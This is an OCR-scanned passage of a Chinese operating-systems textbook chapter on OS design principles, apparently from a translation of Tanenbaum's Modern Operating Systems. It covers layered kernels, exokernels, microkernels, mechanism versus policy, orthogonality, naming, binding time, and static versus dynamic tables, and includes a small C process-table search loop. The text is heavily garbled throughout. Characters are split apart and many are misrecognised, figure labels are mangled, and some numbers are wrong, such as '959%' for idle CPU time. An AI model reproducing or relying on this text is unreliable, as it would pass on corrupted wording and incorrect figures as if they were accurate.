最 糟糕 的 特异 性 ， 就 像 图 11-7 中 HAL 所 做 的 那样 。 或 许 下 一 层 应 该 处 理 
中 新 、 上 下 文 切换 以 及 MMU， 从 而 在 这 一 层 的 代码 大 部 分 是 与 机 需 无 
天 的 。 在 这 一 层 之 上 ， 不 同 的 设计 人 员 可 能 具有 不 同 的 口味 (与 偏 

好 ) 。 一 种 可 能 性 是 让 第 3 层 管理 线程 ， 包 括 调度 和 线程 间 同 步 ， 如 疼 
13-2 所 示 。 此 处 的 思想 是 从 第 4 层 开始 ， 我 们 拥有 适当 的 线程 ， 这 些 线 
程 可 以 被 正常 地 调度 ， 并 且 使 用 标准 的 机 制 “ 例 如 互 斥 量 ) 进行 同步 。 











系统 调用 处 理 程序 
文件 系统 m 


线程 、 线 程 调 度 、 线 程 同 步 


总 藏 低层 便 件 





图 13-2 现代 分 层 操作 系统 的 一 种 可 能 的 设计 





在 第 4 层 ， 我 们 可 能 会 找到 设备 驱动 程序 ， 每 个 设备 驱动 程序 作为 
一 个 蛙 独 的 线程 而 运行 ， 具 有 自己 的 状态 、 程 序 计 数 器 、 寄 存 右 等 ， 可 
能 (但 是 不 必要 ) 处 于 内 核 地 址 空间 内 部 。 这 样 的 设计 可 以 大 大 简化 





IO 结构 ， 因 为 当 一 个 中 断 发 生 时 ， 它 就 可 以 转化 成 在 一 个 互 斥 量 上 的 
unlock， 并 且 调 用 调度 器 以 (潜在 地 ) 调度 重新 就 绪 的 线程 ， 而 该 线程 
曾 阻 塞 在 该 互 斥 量 之 上 。MINIX 使 用 了 这 一 方案 ,但 是 在 UNIX、Linux 
和 Windows Vista 中 ， 中 断 处 理 程序 运行 在 一 类 “无 主 地 带 ” 中 ， 而 不 是 作 
为 适当 的 线程 可 以 被 调度 、 挂 起 等 。 由 于 任何 一 个 操作 系统 的 大 多 数 复 
杂 性 在 于 IO 之 中 ， 使 其 更 加 易于 处 理 和 封装 的 任何 技术 都 是 值得 考虑 
的 。 


在 第 4 层 之 上 ， 我 们 预计 会 找到 虚拟 内 存 、 一 个 或 多 个 文件 系统 以 
及 系统 调用 接口 。 如 果 虚 拟 内 存 处 于 比 文件 系统 更 低 的 层次 ， 那 么 数据 
块 高 速 缓存 就 可 以 分 页 出 去 ， 使 虚拟 内 存 管理 器 能 够 动态 地 诀 定 在 用 户 
页 面 和 内 核 页 面 (包括 高 速 绥 存 ) 之 间 应 该 怎样 划分 实际 内 存 。 
Windows Vista 就 是 这 样 工作 的 。 











2. 外 内 核 








虽然 分 层 在 系统 设计 人 员 中 间 具 有 支持 者 ， 但 是 还 有 另 一 个 阵营 恰 
恰 持 有 相反 的 观点 (Engler 等 人 ，1995) 。 他 们 的 观点 基于 端 到 端的 论 
据 (end-to-end argument) (Saltzer 等 人 ，1984) 。 这 一 概念 说 的 是 ， 如 
果菜 件 事情 必须 由 用 户 程 序 本 里 去 完成 ， 在 一 个 较 低 的 层次 做 同样 的 事 
情 就 是 浪费 。 








考虑 该 原理 对 于 远程 文件 访问 的 一 个 应 用 。 如 果 一 个 系统 担心 数据 








在 传送 中 被 破坏 ， 它 应 该 安排 每 个 文件 在 写 的 时 候 计 算 校 验 和 ， 并 且 校 
验 和 与 文件 一 同 存放 。 当 一 个 文件 通过 网 络 从 源 盘 传送 到 目标 进程 时 ， 
校 验 和 也 被 传 送 ， 并 且 在 接收 端 重新 计算 。 如 果 两 者 不 一 致 ， 文 件 将 被 
丢弃 并 且 重 新 传送 。 


校 验 比 使 用 可 靠 的 网 络 协议 更 加 精确 ， 因 为 除了 位 传送 错误 以 外 ， 
它 还 可 以 捕获 磁盘 错误 、 内 存 错 误 、 路 由 器 中 的 软件 错误 以 及 其 他 错 
误 。 端 到 端的 论据 宣称 使 用 一 个 可 靠 的 网 络 协议 是 不 必要 的 ， 因 为 端点 
《接收 进程 ) 拥有 足够 的 信息 以 验证 文件 本 身 的 正确 性 。 在 这 一 观点 
中 ， 使 用 可 靠 的 网 络 协议 的 惟一 原因 是 为 了 效率 ， 也 就 是 说 ， 更 早 地 捕 
获 与 修复 传输 错误 。 


端 到 端的 论据 可 以 扩展 到 几乎 所 有 操作 系统 。 它 主张 不 要 让 操作 系 
统 做 用 户 程 序 本 里 可 以 做 的 任何 事情 。 例 如 ， 为 什么 要 有 一 个 文件 系 
统 ? 只 要 让 用 户 以 一 种 受 保护 的 方式 读 和 写 原始 磁盘 的 一 个 部 分 就 可 以 
了 。 当 然 ， 大 多 数 用 户 喜 欢 使 用 文件 ， 但 是 端 到 端的 论据 宣称 ， 文 件 系 
统 应 该 是 与 需要 使 用 文件 的 任何 程序 相 链接 的 库 过 程 。 这 一 方案 使 不 同 
的 程序 可 以 拥有 不 同 的 文件 系统 。 这 一 论证 线索 表明 操作 系统 应 该 做 的 
全 部 事情 是 在 竞争 的 用 户 之 间 安 全 地 分 配 资源 《例如 CPU 和 磁盘 ) 。 
Exokernel 是 一 个 根据 问 到 端的 论据 建立 的 操作 系统 〈Engler 等 人 ， 
1995) 。 











3. 基 于 微 内 核 的 客户 -服务 器 系统 


在 让 操作 系统 做 每 件 事情 和 让 操作 系统 什么 也 不 做 之 间 的 折衷 是 让 
操作 系统 做 一 上 事情 。 这 一 设计 导致 微 内 核 的 出 现 ， 它 让 操作 系统 的 大 
部 分 作为 用 户 级 的 服务 器 进程 而 运行 ， 如 图 13-3 所 示 。 在 所 有 设计 中 这 
是 最 模块 化 和 最 灵活 的 。 在 灵活 性 上 的 极限 是 让 每 个 设备 驱动 程序 也 作 
为 一 个 用 户 进 程 而 运行 ， 从 而 完全 保护 内 核 和 其 他 驱动 程序 ， 但 是 让 设 
备 驱 动 程序 运行 在 内 核 会 增加 模块 化 程度 。 




















客户 通过 向 服务 
器 进程 发 送信 息 
来 获得 服务 


图 13-3 基于 微 内 核 的 客户 -服务 器 计算 











当 设备 驱动 程序 运行 在 内 核 态 时 ， 可 以 直接 访问 硬件 设备 寄存 器 ， 
否则 需要 某 种 机 制 以 提供 这 样 的 访问 。 如 果 硬 件 允 许 ， 可 以 让 每 个 驱动 
程序 进程 仅 访问 它 需要 的 那些 VO 设 备 。 例 如 ， 对 于 内 存 映 射 的 To， 每 
个 驱动 程序 进程 可 以 拥有 页 面 将 它 的 设备 映射 进来 ， 但 是 没有 其 他 设备 
的 页 面 。 如 果 IO 端口 空间 可 以 部 分 地 加 以 保护 ， 就 可 以 保证 只 有 相应 
的 正确 部 分 对 每 个 驱动 程序 可 用 。 











即使 没有 硬件 帮助 可 用 ， 仍 然 可 以 设法 使 这 一 思想 可 行 。 此 时 需要 


的 是 一 个 新 的 系统 调用 ， 该 系统 调用 仅 对 设备 驱动 程序 进程 可 用 ， 它 提 
供 一 个 (端口 ， 取 值 ) 对 列表 。 内 核 所 做 的 是 首先 进行 检查 以 了 解 进程 
是 售 拥有 列表 中 的 所 有 端口 ， 如 果 是 ， 它 就 将 相应 的 取 值 复制 到 端口 以 
发 起 设备 IO。 类 似 的 调用 可 以 用 一 种 受 保护 的 方式 读 MO 端 口 。 


这 一 方法 使 设备 驱动 程序 避免 了 检查 并且 破坏 〉 内 核 数 据 结构 ， 
这 《在 很 大 程度 上 ) 是 一 件 好 事情 。 一 组 类 似 的 调用 可 以 用 来 让 驱动 程 
序 进程 读 和 写 内 核 表 格 ， 但 是 仅 以 一 种 受 控 的 方式 并 且 需 要 内 核 的 批 
准 。 





这 一 方法 的 主要 问题 ， 并 且 一 般 而 言 是 针对 微 内 核 的 主要 问题 ， 是 
额外 的 上 下 文 切 换 导 致 性 能 受到 影响 。 然 而 ， 微 内 核 上 的 所 有 工作 实际 
上 是 许多 年 前 当 CPU 还 非常 缓慢 的 时 候 做 的 。 如 今 ， 用 尽 CPU 的 处 理 能 
力 并 且 不 能 容忍 微小 性 能 损失 的 应 用 程序 是 十 分 稀少 的 。 毕 竟 ， 当 运行 
一 个 字 处 理 器 或 Web 浏 览 器 时 ，CPU 可 能 有 959% 的 时 间 是 空闲 的 。 如 果 
一 个 基于 微 内 核 的 操作 系统 将 一 个 不 可 靠 的 3GHz 的 系统 转变 为 一 个 可 
靠 的 2.5GHz 的 系统 ， 可 能 很 少 有 用 户 会 抱 忽 。 毕 驶 ， 仪 仅 在 几 年 以 前 当 
他 们 得 到 具有 1GHz 的 速度 (就 当时 而 言 十 分 惊人 〉 的 系统 时 ， 大 多 数 
用 户 是 相当 快乐 的 。 











4. 可 扩展 的 系统 





对 于 上 面 讨 论 的 客户 -服务 器 系统 ， 思 想 是 让 尽 可 能 多 的 东西 脱离 





内 核 。 相 反 的 方法 是 将 更 多 的 模块 放 到 内 核 中 ,但 是 以 一 种 “ 受 保 扩 
的 方式。 当然 ， 这 里 的 关键 字 是 “ 受 保护 的 ”。 我 们 在 9.5.6 节 中 研究 了 
菏 些 保护 机 制 ， 这 些 机 制 最 初 打算 用 于 通过 Internet 引 入 小 程序 ， 但 是 对 
于 将 外 来 的 代码 插入 到 内 核 中 的 过 程 同样 适用 。 最 重要 的 是 沙 盒 技术 和 
代码 签名 ， 因 为 解释 对 于 内 核 代码 来 说 实际 上 是 不 可 行 的 。 











当然 ， 可 扩展 的 系统 目 身 并 不 是 构造 一 个 操作 系统 的 方法 。 然 而 ， 
通过 以 一 个 只 是 包含 保护 机 制 的 最 小 系统 为 开端 ， 然 后 每 次 将 受 保护 的 
模块 添加 到 内 核 中 ， 直 到 达到 期 望 的 功能 ， 对 于 手边 的 应 用 而 言 一 个 最 
小 的 系统 就 建立 起 来 了 。 按 照 这 一 观点 ， 对 于 每 一 个 应 用 ， 通 过 仅仅 包 
含 它 所 需要 的 部 分 ， 就 可 以 裁 勇 出 一 个 新 的 操作 系统 。Paramecium 就 是 


这 类 系统 的 一 个 实例 (Van Doorn,2001) 。 





5. 内 核 线程 


此 处 ， 另 一 个 相关 的 问题 是 系统 线程 ， 无 论 选择 哪 种 结构 模型 。 有 
时 允许 存在 与 任何 用 户 进程 相隔 离 的 内 核 线程 是 很 方便 的 。 这 些 线程 可 
以 在 后 台 运 行 ， 将 脏 页 面 写 入 磁盘 ， 在 内 存 和 磁盘 之 间 交 换 进 程 ， 如 此 
等 等 。 实 际 上 ， 内 核 本 里 可 以 完全 由 这 样 的 线程 构成 ， 所 以 当 一 个 用 户 
发 出 系统 调用 时 ， 用 户 的 线程 并 不 是 在 内 核 模式 中 运行 ， 而 是 阻 窄 并且 
将 控制 传 给 一 个 内 核 线程 ， 该 内 核 线程 接管 控制 以 完成 工作 。 


除了 在 后 台 运 行 的 内 核 线程 以 外 ， 大 多 数 操 作 系 统 还 要 局 动 许 多 守 





护 进程 。 虽 然 这 坚守 护 进程 不 是 操作 系统 的 组 成 部 分 ， 但 是 它们 通 闻 执 
行 “系统 ”类 型 的 活动 。 这 些 活动 包括 接收 和 发 送 电子 邮件 ， 并 且 对 远程 
用 户 各 种 各 样 的 请 求 进行 服务 ， 例 如 FTP 和 Web 网 页 。 


13.3.2 ”机 制 与 策略 


另 一 个 有 助 于 体系 结构 一 致 性 的 原理 是 机 制 与 策略 的 分 离 ， 该 原理 
同时 还 有 助 于 使 系统 保持 小 型 和 良好 的 结构 。 通 过 将 机 制 放 入 操作 系统 
而 将 策略 留 给 用 户 进程 ， 即 使 存在 改变 集 略 的 需要 ， 系 统 本 里 也 可 以 保 
持 不 变 。 即 使 策略 模块 必须 保留 在 内 核 中 ， 如 果 可 能 ， 它 也 应 该 与 机 制 
相隔 离 ， 这 样 集 略 模 块 中 的 变化 就 不 会 影响 机 制 模块 。 


为 了 使 策略 与 机 制 之 间 的 划分 更 加 清晰 ， 让 我 们 考虑 两 个 现实 世界 
的 例子 。 第 一 个 例子 ， 考 虑 一 家 大 型 公司 ， 该 公司 拥有 人 负责 回 员工 发 放 
新 水 的 工资 部 门 。 该 部 门 拥 有 计算 机 、 软 件 、 空 昌文 票 、 与 银行 的 契约 
以 及 更 多 的 机 制 ， 以 便 准 确 地 发 出 薪水 。 然 而 ， 策 略 一 一 确定 谁 将 获得 
多 少 薪水 一 一 是 完全 与 机 制 分 开 的 ， 并 且 是 由 管理 部 门 决定 的 。 工 资 部 
门 只 是 做 他 们 被 吟 只 做 的 事情 。 





第 二 个 例子 ， 考 虑 一 家 饭店 。 它 拥有 提供 餐饮 的 机 制 ， 包 括 餐 蝎 、 
餐具 、 服 务 员 、 充 满 设 备 的 厨房 、 与 信用 卡 公司 的 契约 ， 如 此 等 等 。 策 
略 是 由 厨师 长 设 定 的 ， 也 惑 是 说 ， 厨 师长 决定 染 单 上 有 什么 。 如 条 厨 师 
长 决定 撤 掉 豆腐 换 上 和 牛排， 那么 这 一 新 的 策略 可 以 由 现 有 的 机 制 来 处 
Hi 


现在 让 我 们 考虑 茶 些 操作 系统 的 例子 。 首 先 考 虑 线程 调度 。 内 核 可 


能 拥有 一 个 优先 级 调度 器 ， 具 有 k 个 优先 级 。 机 制 是 一 个 数组 ， 以 优先 
级 为 索引 ， 如 图 10-11 或 图 11-19 所 示 。 每 个 数组 项 是 处 于 该 优先 级 的 就 
绪 线 程 列表 的 表 头 。 调 度 器 只 是 从 最 高 优先 级 到 最 低 优 移 级 搜索 数组 ， 
选中 它 找 到 的 第 一 个 线程 。 策略 是 设 定 优 先 级 。 系 统 可 能 具有 不 同 的 用 
户 类 别 ， 每 个 类 别 拥 有 不 同 的 优先 级 。 它 还 可 能 允许 用 户 进 程 设 置 其 线 
程 的 相对 优先 级 。 优 先 级 可 能 在 完成 WO 之 后 增加 ， 或 者 在 用 完 时 间 配 
额 之 后 降低 。 还 有 众多 的 其 他 策略 可 以 遵循 ， 但 是 此 处 的 中 心思 想 是 设 
置 宋 略 与 执行 之 间 的 分 离 。 

















第 二 个 例子 是 分 页 。 机 制 涉及 到 MMU 管 理 ， 维 护 占 用 页 面 与 空闲 
页 面 的 列表 ， 以 及 用 来 将 页 面 移入 磁盘 或 者 移出 磁盘 的 代码 。 和 全 上 略 是 当 
页 面 故障 发生 时 决定 做 什么 ， 它 可 能 是 局 部 的 或 全 局 的 ， 基 于 LRU 的 或 
基于 FIFO 的 ， 或 者 是 别 的 东西 ， 但 是 这 一 算法 可 以 (并 且 应 该 ) 完全 独 
并 于 实际 管理 页 面 的 机 制 |。 





第 三 个 例子 是 允许 将 模块 装载 到 内 核 之 中 。 机 制 关 心 的 是 它们 如 何 
被 插入 、 如 何 被 链接 、 它 们 可 以 发 出 什么 调用 ， 以 及 可 以 对 它们 发 出 什 
么 调用 。 策 略 是 确定 允许 谁 将 模块 装载 到 内 核 之 中 以 及 装载 哪些 模块 。 
也 许 只 有 超级 用 户 可 以 装载 模块 ， 也 许 任何 用 户 都 可 以 装载 被 适当 权威 
机 构 数字 签名 的 模块 。 


13.3.3” 正 交 性 


民 好 的 系统 设计 在 于 单独 的 概念 可 以 独立 地 组 合 。 例 如 ， 在 C 语 言 
中 ， 存 在 基本 的 数据 类 型 ， 包 括 整 数 、 字 答 和 浮 点 数 ， 还 存在 用 来 组 合 
数据 类 型 的 机 制 ， 包 括 数组 、 结 构 和 联合 。 这 些 概念 独立 地 组 合 ， 人 允许 
拥有 整数 数组 、 字 符 数组 、 浮 点 数 的 结构 和 联合 成 员 等 。 实 际 上 ， 一 旦 
定义 了 一 个 新 的 数据 类 型 ， 如 整数 数组 ， 就 可 以 如 同一 个 基本 数据 类 型 
一 样 使 用 它 ， 例 如 作为 一 个 结构 或 者 一 个 联合 的 成 员 。 独 立地 组 合 单独 
的 概念 的 能 力 称 为 正 交 性 Corthogonality) ， 它 是 简单 性 和 完整 性 原理 
的 直接 结 


正 交 性 概念 还 以 各 种 各 样 的 伪装 出 现在 操作 系统 中 ，Linux 的 clone 
系统 调用 就 是 一 个 例子 ， 它 创建 一 个 新 线程 。 该 调用 有 一 个 位 图 作为 参 
数 ， 它 允许 单独 地 共享 或 复制 地 址 空间 、 工 作 目 录 、 文 件 描 述 符 以 及 信 
写 。 如 果 复 制 所 有 的 东西 ， 我 们 将 得 到 一 个 进程 ， 束 像 调用 fork 一 样 。 
如 果 什 么 都 不 复制 ， 则 是 在 当前 进程 中 创建 一 个 新 线程 。 然 而 ， 创 建 共 
享 的 中 间 形 式 同样 也 是 可 以 的 ， 而 这 在 传统 的 UNIX 系 统 中 十 不 可 能 
的 。 通 过 分 离 各 种 特性 并 且 使 它们 正 区 ， 是 可 以 做 到 更 好 地 控制 目 由 度 
的 。 











正 交 性 的 另 一 个 应 用 是 Windows Vista 中 进程 概念 与 线程 概念 的 分 


离 。 进 程 是 一 个 资源 容器 ， 既 不 多 也 不 少 。 线 程 是 一 个 可 调度 的 实体 。 
当 把 男 一 个 进程 的 句柄 提供 给 一 个 进程 时 ， 它 拥有 多 少 个 线程 部 是 没有 
关系 的 。 当 一 个 线程 被 调度 时 ， 它 从 属于 哪个 进程 也 是 没有 关系 的 。 这 


些 概念 是 正 交 的 。 





正 交 性 的 最 后 一 个 例子 来 自 UNIX。 在 UNIX 中 ， 进 程 的 创建 分 两 步 
完成 : fork 和 exec。 创 建新 的 地 址 空间 与 用 新 的 内 存 映 像 装 载 该 地 址 空 
间 是 分 开 的 ， 这 束 为 在 两 者 之 间 做 一 些 事情 提供 了 可 能 (例如 处 理 文件 
描述 符 )。 在 Windows Vista 中 ， 这 两 个 步骤 不 能 分 开 ， 也 就 是 说 ， 创 建 
新 的 地 址 空间 与 填充 该 地 址 空间 的 概念 不 是 正 交 的 。Linux 的 clone 加 
exec 序 列 是 更 加 正 交 的 ， 因 为 存在 更 细 粒 度 的 构造 块 可 以 利用 。 作 为 一 
般 性 的 规则 ， 拥 有 少量 能 够 以 很 多 方式 组 合 的 正 交 元 素 ， 将 形成 小 巧 、 
简单 和 精致 的 系统 。 


13.3.4 MZ 





操作 系统 使 用 的 最 长 久 的 数据 结构 具有 某 种 类 型 的 名 字 或 标识 符 ， 
通过 名 字 或 标识 符 就 可 以 引用 这 些 数据 结构 。 显 而 易 见 的 例子 有 注册 
名 、 文 件 名 、 设 备 名 、 进 程 ID 等 。 在 操作 系统 的 设计 与 实现 中 ， 如 何 构 


造 和 管理 这 些 名 字 是 一 个 重要 的 问题 。 








为 人 们 的 使 用 而 设计 的 名 字 是 ASCII 或 Unicode 形 式 的 字符 串 ， 并 且 
通常 是 层次 化 的 。 目 录 路 径 ， 例 如 /usr/ast/books/mos2/chap-12， 显 然 是 
层次 化 的 ， 它 指出 从 根 目录 开始 搜索 的 一 个 目录 序列 。URL 也 是 层次 化 
的 。 例 如 ，www.cs.vu.nl/~~ast/ 表 示 一 个 特定 国家 (nl) 的 一 所 特定 大 学 
Cvu) 的 一 个 特定 的 系 cs) 内 的 一 台 特 定 的 机 器 (www) o R RSJ 
面 的 部 分 指出 的 是 目标 机 器 上 的 一 个 特定 的 文件 ， 在 这 种 情形 中 ， 按 照 
惯例 ， 该 文件 是 ast 主 目录 中 的 www/index.html。 注 意 URL (以 及 一 般 的 
DNS 地 址 ， 包 括 电 子 邮件 地 址 ) 是 “ 反 向 的 ”， 从 树 的 底部 开始 并 且 疝 上 
走 ， 这 与 文件 名 有 所 不 同 ， 后 者 从 树 的 顶部 开始 并 且 向 下 走 。 看 待 这 一 
问题 的 另 一 种 方法 是 从 头 写 这 棵 树 是 从 左 开始 向 右 走 ， 还 是 从 右 开始 向 
Exe. 








命名 经 常 在 外 部 和 内 部 两 个 层次 上 实现 。 例 如 ， 文 件 总 是 具有 字符 
串 名 字 供 人 们 使 用 。 此 外 ， 几 乎 总 是 存在 一 个 内 部 名 字 由 系统 使 用 。 在 








UNIX 中 ， 文 件 的 实际 名 字 是 它 的 i 节点 号 ， 在 内 部 根本 就 不 使 用 ASCII 
名 字 。 实 际 上 ， 它 甚至 不 是 惟一 的 ， 因 为 一 个 文件 可 能 具有 多 个 链接 指 
问 它 。 在 Windows Vista 中 ， 相 仿 的 内 部 名 字 是 MEFT 中 文件 的 索引 。 目 

录 的 任务 是 在 外 部 名 字 和 内 部 名 字 之 间 提 供 映射 ， 如 图 13-4 所 示 。 





外 部 名 罕 : /usrasybooks/mos2/Chap-12 


一 :HL =e 
oie. /ust/ast/books/mos2 ols AR 












Chap-10 
Chap- | 38 | 
Chap-12 


内 部 名 字 : 2 


me 


-DMD Of O ON 


图 13-4 目录 用 来 将 外 部 名 字 映 射 到 内 部 名 字 上 





在 许多 情况 下 例如 上 面 给 出 的 文件 名 的 例子 )， 内 部 名 字 是 一 个 
无 符 写 整数 ， 用 作 进 入 一 个 内 部 表格 的 索引 。 表 格 -索引 名 字 的 其 他 例 
子 还 有 UNIX 中 的 文件 描述 符 和 Windows Vista 中 的 对 象 句柄 。 注 意 这 些 
都 没有 任何 外 部 表示 ， 它 们 严格 地 被 系 统 和 运行 的 进程 所 使 用 。 一 般 而 
言 ， 对 于 当 系 统 重 新 启动 时 就 会 丢失 的 暂时 的 名 字 ， 使 用 表格 索引 是 一 
个 很 好 的 主意 。 




















操作 系统 经 常 文 持 多 个 名 字 空 间 ， 既 在 内 部 义 在 外 部 。 例 如 ， 在 第 


11 章 我 们 了 解 了 Windows Vista 文 持 的 三 个 外 部 名 字 空 间 : 文件 名 、 对 象 
名 和 注册 表 名 《并 且 还 有 我 们 没有 考虑 的 活动 目录 名 ) 。 此 外 ， 还 存在 
着 使 用 无 符号 整数 的 数 不 清 的 内 部 名 字 空 间 ， 例 如 对 象 句柄 、MFT 项 

等 。 尺 管 外 部 名 字 空 间 中 的 名 字 都 是 Unicode 字 符 串 ,但 是 在 注册 表 中 

查寻 一 个 文件 名 是 不 可 以 的 ， 正 如 在 对 象 表 中 使 用 MFT 索 引 是 不 可 以 

的 。 在 一 个 良好 的 设计 中 ， 相 当 多 的 考虑 花 在 了 需要 多 少 个 名 字 空 间 ， 

每 个 名 字 空 间 中 名 字 的 语法 是 什么 ， 怎 样 分 辨 它们 ， 是 否 存在 抽象 的 和 
相对 的 名 字 ， 如 此 等 等 。 











13.3.5 绑 定 的 时 机 


正如 我 们 刚刚 看 到 的 ， 操 作 系 统 使 用 多 种 类 型 的 名 字 来 引用 对 象 。 
有 时 在 名 字 和 对 象 之 间 的 映射 是 固定 的 ， 但 是 有 时 不 是 。 在 后 一 种 情况 
下 ， 何 时 将 名 字 与 对 象 绑 定 可 能 是 很 重要 的 。 一 般 而 言 ， 早 期 绑 定 
Cearly binding) 是 简单 的 ， 但 是 不 灵活 ， 而 晚期 绑 定 〈late binding) M 
比较 复杂 ， 但 是 通常 更 加 灵活 。 








为 了 阐明 绑 定 时 机 的 概念 ， 让 我 们 看 一 看 某 些 现实 世界 的 例子 。 晤 
期 绑 定 的 一 个 例子 是 茶 些 高 等 学 校 允 许 父 母 在 页 儿 出 生 时 登记 入 学 ， 并 
且 预 付 当 前 的 学 费 。 以 后 当 学 生长 大 到 18 岁 时 ， 和 学 费 已 经 全 部 付 清 ， 无 


WHARA ZA R. 





在 制造 业 中 ， 预 先 定 购 零 部 件 并 且 维 持 零 部 件 的 库存 量 是 早期 绑 
定 。 相 反 ， 即 时 制造 要 求 供 货 商 能 够 立刻 提供 零 部 件 ， 不 需要 事先 通 


知 。 这 就 是 晚期 绑 定 。 











程序 设计 语言 对 于 变量 通常 支持 多 种 绑 定时 机 。 编 译 器 将 全 局 变量 
绑 定 到 特殊 的 虚拟 地 址 ， 这 是 早期 绑 定 的 例子 。 过 程 的 局 部 变量 在 过 程 
被 调用 的 时 刻 《〈 在 栈 中 ) 分 配 一 个 虚拟 地 址 ， 这 是 中 间 绑 定 。 存 放 在 堆 
中 的 变量 〈 这 些 变量 由 C 中 的 malloc 或 Java 中 的 new 分 配 ) 仅仅 在 它们 实 
际 被 使 用 的 时 候 才 分 配 虚 拟 地 址 ， 这 便 是 晚期 绑 定 。 











操作 系统 对 大 多 数 数 据 结构 通常 使 用 早期 绑 定 ， 但 是 偶尔 为 了 灵活 
性 也 使 用 晚期 绑 定 。 内 存 分 配 是 一 个 相关 的 案例 。 在 缺乏 地 址 重 定位 硬 
件 的 机 器 上 ， 早 期 的 多 道 程序 设计 系统 不 得 不 在 茶 个 内 存 地 址 装载 一 个 
程序 ， 并 且 对 其 重 定 位 以 便 在 此 处 运行 。 如 采 它 曾经 被 交换 出 去 ， 那 么 
它 就 必须 装 回 到 相同 的 内 存 地 址 ， 否 则 避 ® 会 出 错 。 相 反 ， 页 式 虚 拟 内 存 
征 晚期 绑 定 的 一 种 形式 。 在 页 面 被 访问 并 且 实际 装 入 内 存 之 前 ， 与 一 个 
给 定 的 虚拟 地 址 相对 应 的 实际 物理 地 址 是 不 知道 的 。 


晚期 绑 定 的 另 一 个 例子 是 GUI 中 窗口 的 放置 。 在 早期 图 形 系统 中 ， 
程序 员 必 须 为 屏幕 上 的 所 有 图 像 设 定 绝对 屏幕 坐标 ， 与 此 相对 照 ， 在 现 
代 GUI 中 ， 软 件 使 用 相对 于 窗口 原点 的 坐标 ， 但 是 在 窗口 被 放置 在 屏幕 
上 之 前 该 坐标 是 不 确定 的 ， 并 且 以 后 ， 它 甚至 是 可 能 改变 的 。 

















13.3.6 ”静态 与 动态 结构 








操作 系统 设计 人 员 经 常 被 迫 在 静 态 与 动态 数据 结构 之 间 进 行 选择 。 
静态 结构 总 是 简单 易 懂 ， 更 加 容易 编程 并 且 用 起 来 更 快 ， 动 态 结构 则 更 
加 灵活 。 一 个 显而易见 的 例子 是 进程 表 。 早 期 的 系统 只 是 分 配 一 个 固定 
的 数组 ， 存 放 每 个 进程 结构 。 如 果 进 程 表 由 256 项 组 成 ， 那 么 在 任意 时 
刻 只 能 存在 256 个 进程 。 试 图 创建 第 257 个 进程 将 会 失败 ， 因 为 缺乏 表 空 
闻 。 关 似 的 考虑 对 于 打开 的 文件 表 〈 每 个 用 户 的 和 系统 范围 的 ) 以 及 许 
多 其 他 内 核 表 格 也 是 有 效 的 。 








一 个 人 答 代 的 策略 是 将 进程 表 建 立 为 一 个 小 型 表 的 链表 ， 最 初 只 有 
个 表 。 如 宋 该 表 被 填 满 ， 可 以 从 全 局 存储 池 中 分 配 尺 一 个 表 并 且 将 其 链 
接 到 前 一 个 表 。 这 样 ， 在 全 部 内 核 内 存 极 耗 尽 之 前 ， 进 程 表 不 可 能 被 填 
满 。 

另 一 方面 ， 搜 索 表 格 的 代码 会 变 得 更 加 复杂 。 例 如 ， 在 图 13-5 中 给 
出 了 搜索 一 个 静态 进程 表 以 查找 给 定 PID，pid 的 代码 。 该 代码 简单 有 
效 。 对 于 小 型 表 的 链表 ， 做 同样 的 搜索 则 需要 更 多 的 工作 。 


found = 0; 
for (p = &proc_table[0]; p < &proc_table[PROC_TABLE_ SIZE]; p++) { 


if (p->proc_pid == pid) { 
found = 1; 
break; 
} 
} 





图 135 对 于 给 定 PID 搜 索 进 程 表 的 代码 


当 存 在 大 量 的 内 存 或 者 当 表 的 利用 可 以 猜 调 得 相当 准确 时 ， 静 态 表 
征 最 佳 的 。 例 如 ， 在 一 个 单 用 户 系 统 中 ， 用 户 不 太 可 能 立刻 局 动 64 个 以 
上 的 进程 ,并且 如 果 试 图 局 动 第 65 个 进程 失败 了 ， 也 并 不 是 一 个 彻底 的 
灾难 。 


还 有 为 一 种 选择 是 使 用 一 个 固定 大 小 的 表 ， 但 是 如 果 该 表 填 满 7 了 ， 
就 分 配 一 个 新 的 固定 大 小 的 表 ， 比 方 说 大 小 是 原来 的 两 倍 。 然 后 将 当前 
的 表 项 复制 到 新 表 中 并 且 把 旧 表 返回 空 几 存储 池 。 这 样 ， 表 总 是 连续 的 
而 不 是 链接 的 。 此 处 的 缺点 是 再 要 菏 些 人 存储 管理 ， 并 且 现 在 表 的 地 址 是 


变量 而 不 是 常量 。 




















对 于 内 核 栈 也 存在 类 似 的 问题 。 当 一 个 线程 切换 到 内 核 模式 ， 或 者 
当 一 个 内 核 模式 线程 运行 时 ， 它 在 内 核 空间 中 需要 一 个 栈 。 对 于 用 户 线 
程 ， 栈 可 以 初始 化 成 从 虚拟 地 址 空间 的 项 部 问 下 生长 ， 所 以 大 小 不 需要 
预先 设 定 。 对 于 内 核 线程 ， 大 小 必须 预先 设 定 ， 因 为 栈 占 据 了 茶 些 内 核 
虚拟 地 址 空间 并 且 可 能 存在 许多 栈 。 问 题 是 : 每 个 栈 应 该 得 到 多 少 衬 





间 ? 此 处 的 权衡 与 进程 表 是 类 似 的 。 








另 一 个 静态 -动态 权衡 是 进程 调度 。 在 某 些 系统 中 ， 特 别 是 在 实时 
系统 中 ， 调 度 可 以 预先 静态 地 完成 。 例 如 ， 航 空 公司 在 班机 启 航 前 几 周 
就 知道 它 的 飞机 什么 时 候 要 出 有 发。 类 似 地 ， 多 媒体 系统 预先 知道 何 时 调 
度 音 频 、 视 频 和 其 他 进程 。 对 于 通用 的 应 用 ， 这 些 考虑 是 不 成 立 的 ， 并 
且 调 度 必须 是 动态 的 。 








还 有 一 个 静态 -动态 问题 是 内 核 结 构 。 如 果 内 核 作 为 单一 的 二 进 制 
程序 建立 并 且 装 载 到 内 存 中 运行 ， 情 况 是 比较 简单 的 。 然 而 ， 这 一 设计 
的 结果 是 添加 一 个 新 的 IO 设备 束 需 要 将 内 核 与 新 的 设备 驱动 程序 重新 
链接 。UNIX 的 早期 版 本 就 是 以 这 种 方式 工作 的 ， 在 小 型 计算 机 环境 中 
它 相 当 令 人 满意 ， 那 时 添加 新 的 VO 设备 是 十 分 罕见 的 事情 。 如 今 ， 大 
多 数 操作 系统 允许 将 代码 动态 地 添加 到 内 核 之 中 ， 随 之 而 来 的 则 是 所 有 
额外 的 复杂 性 。 














13.3.7” 目 顶 同 下 与 目 展 同上 的 实现 





虽然 最 好 是 目 顶 癌 下 地 设计 系统 ， 但 是 在 理论 上 系统 可 以 目 顶岗 下 
